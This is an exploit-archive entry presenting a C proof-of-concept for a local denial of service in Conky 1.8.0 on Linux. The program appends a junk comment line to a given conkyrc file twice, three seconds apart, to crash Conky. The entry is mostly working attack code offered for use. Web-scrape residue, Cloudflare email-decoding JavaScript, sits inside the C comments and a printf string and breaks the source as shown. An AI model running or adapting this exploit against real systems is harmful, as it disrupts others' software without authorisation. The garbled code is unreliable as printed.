Conky Linux 1.8.0 Local DoS/PoC Exploit

2011-06-14T00:00:00
ID 1337DAY-ID-16334
Type zdt
Reporter Arturo D'Elia
Modified 2011-06-14T00:00:00

Description

Exploit for linux platform in category dos / poc

                                        
                                            /*                                                      */
/*  Vulnerability Conky 1.8.0 on Linux                  */
/*   Tested on: Linux with kernel 2.6.32.1-smp          */
/*       Found: by Arturo D'Elia                        */
/*  Date found: 12 Dec 2010                             */
/*         Fix: No Fix                                  */
/*    Contacts: [email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>                  */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
char killyou[]=  "# w000wwwww i exploit it and i kill you!";
 
int main( int argc, char **argv){
 
    FILE *fp;
 
    /*  Write the information program*/
    printf("\n[*] Conky 1.8.0 Local DoS/PoC Exploit [*]\n");
    printf("[*]       Coded by: Arturo D'Elia\n");
    printf("[*]      Tested on: Linux\n");
    printf("[*] Kernel version: 2.6.32.1-smp\n");
    printf("[*]      Bug Found: 12 Dec 2010\n");
    printf("[*]       Contacts: [email protected]<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script>\n\n");
 
    /*  Check the input parameter   */
    if(argc!=2)
        exit(fprintf(stderr,"Usage: %s < path conkyrc >\n",argv[0]));
 
    /*  Check file exsist           */
    printf("[>] Open conky configuration\n");
    if((fp=fopen(argv[1],"r"))==NULL)
        exit(fprintf(stderr,"[x] Cannot open %s file\n",argv[1]));
    fclose(fp);
 
    /*  Open file for append and i send it the  */
    /*  exploited strings                       */
    fp=fopen(argv[1],"a");
    printf("[>] Send the DoS/PoC string\n");
    fprintf(fp,"%s\n",killyou);
    fclose(fp);
 
    /*  Wait 3 seconds              */
    usleep(3000000);
 
    /*  Resend exploited strings    */
    fp=fopen(argv[1],"a");
    fprintf(fp,"%s\n",killyou);
    fclose(fp);
 
    /*  Ok guy.                     */
    printf("[*] Ok guy, you kill it.\n\n");
return 0;
}



#  0day.today [2018-04-11]  #